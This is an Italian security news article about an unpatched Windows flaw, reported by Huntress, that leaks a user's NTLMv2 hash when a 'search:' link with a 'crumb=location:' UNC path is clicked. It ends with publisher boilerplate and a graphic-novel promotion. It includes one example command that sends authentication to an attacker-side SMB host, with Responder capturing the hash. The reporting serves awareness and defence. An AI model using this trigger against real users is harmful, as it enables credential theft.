Una nuova vulnerabilità di Windows permette agli aggressori di ottenere l'hash NTLMv2 dell'utente con un clic su un collegamento, bypassando anche le protezioni di Defender. Il problema è simile a CVE-2026-33829 e sfrutta il gestore di collegamenti integrato nel sistema operativo.
Un clic su un collegamento in Windows può essere sufficiente affinché il computer trasmetta i dati ad un ipotetico aggressore in alcune specifiche condizioni. Il problema non è legato ad un malware o ad una complessa catena di exploit, ma al normale gestore di collegamenti integrato nel sistema.
Gli specialisti di Huntress hanno rivelato i dettagli di un problema non risolto attraverso il quale un utente malintenzionato può ottenere l’hash NTLMv2 di un utente. La nuova variante rilevata è simile al CVE-2026-33829, una vulnerabilità nell’app Windows Snipping che Microsoft ha corretto ad aprile 2026.
Nello specifico, il CVE-2026-33829 che ha uno score CVSSv3 medio pari a 5.0, ha interessato il gestore ms-screensketch: e ha consentito l’estrazione di dati sensibili.
Advertising
Come descritto da Microsoft, un utente malintenzionato potrebbe convincere un utente a fare clic su un collegamento appositamente predisposto in un browser, in una pagina Web o in un’e-mail. Una volta che l’utente ha accettato di eseguire tale collegamento, il computer si connetterebbe al server SMB dell’aggressore e potrebbe rilevare l’hash NTLMv2, che potrebbe essere utilizzato per accedere al sistema della vittima.
Il problema relativo alla precedente vulnerabilità era il gestore del collegamento che accettava il parametro filePath, ma non controllava il percorso passato. Se il parametro includeva un percorso di rete UNC, Windows effettuava l’accesso alla risorsa specificata avviando l’autenticazione NTLM.
Il nuovo problema produce lo stesso risultato, ma utilizza un gestore diverso. Invece di ms-screensketch: e del parametro filePath, vengono utilizzati i parametri search: schema e crumb=location:. Un esempio di tale comando è questo: start “” “search=test&crumb=location:\10.0.1.100\share”
Il problema è stato riprodotto su Windows 11 25H2 Pro. Il test ha utilizzato un account normale senza diritti di amministratore, con la protezione Microsoft Defender abilitata per impostazione predefinita. Dalla parte dell’aggressore c’era un server con lo strumento Responder, che riceveva immediatamente i dati dell’utente dopo aver lanciato il search: link con il parametro crumb=location: e il percorso di rete SMB.
La particolarità dell’attacco è che l’utente vede solo un messaggio standard di Windows sull’impossibilità di accedere al dispositivo, al percorso o al file. A quel punto, l’hash ha già lasciato il computer. Huntress nota che la fuga di dati, si verifica al primo avvio di una sessione di accesso e che ripetuti tentativi prima che l’utente si disconnetta dall’account restituiscano già un rifiuto di accesso.
Advertising
L’hash raccolto non è una password in chiaro, ma è comunque preziosa per un attacco. Huntress ha segnalato il problema al Microsoft Response Center il 15 aprile 2026, il giorno successivo al rilascio della patch. Microsoft ha rifiutato di rilasciare una correzione e un identificatore CVE separato, dato che il problema risultava della stessa natura della prima segnalazione.
📢 Resta aggiornatoTi è piaciuto questo articolo? Rimani sempre informato seguendoci su Google Discover (scorri in basso e clicca segui) e su 🔔 Google News. Ne stiamo anche discutendo sui nostri social: 💼 LinkedIn, 📘 Facebook e 📸 Instagram. Hai una notizia o un approfondimento da segnalarci? ✉️ Scrivici
La Redazione di Red Hot Cyber fornisce aggiornamenti quotidiani su bug, data breach e minacce globali. Ogni contenuto è validato dalla nostra community di esperti come Pietro Melillo, Massimiliano Brolli, Sandro Sana, Olivia Terragni e Stefano Gazzella.
Grazie alla sinergia con i nostri Partner leader nel settore (tra cui Accenture, CrowdStrike, Trend Micro e Fortinet), trasformiamo la complessità tecnica in consapevolezza collettiva, garantendo un'informazione accurata basata sull'analisi di fonti primarie e su una rigorosa peer-review tecnica.
Betti RHC, la prima graphic novel al mondo dedicata alla cybersecurity awareness, ha finalmente il suo sito ufficiale. Uno spazio tutto suo dove scoprire il progetto, sfogliare le copertine degli episodi e immergersi nel mondo di Betti: la giovane laureanda in informatica che, dopo la morte misteriosa del padre, si trasforma nell'hacker più potente del mondo. Una storia avvincente che, episodio dopo episodio, affronta una minaccia digitale diversa — dal phishing al ransomware, fino al cyberbullismo — e insegna a riconoscerla e a difendersi, senza che sembri mai una lezione.
Sul sito trovate tutto ciò che rende Betti un progetto diverso dal solito: la sua filosofia, le anteprime delle tavole e il racconto di come nasce ogni volume. Perché dietro Betti RHC c'è solo lavoro umano: ogni tavola è disegnata interamente a mano dagli artisti del Gruppo Arte di Red Hot Cyber, senza alcun uso di intelligenza artificiale. E a garantire che ogni storia sia realistica e tecnicamente corretta c'è la supervisione degli hacker etici del gruppo HackerHood, che mantengono il racconto fedele al mondo reale della sicurezza informatica.
C'è spazio anche per le aziende, che possono usare Betti come strumento di awareness diverso dai soliti corsi: acquistare i volumi, personalizzarli con il proprio brand o sponsorizzare nuovi episodi. E come primo regalo, l'episodio "Byte the Silence", dedicato al cyberbullismo, è scaricabile gratuitamente per uso personale.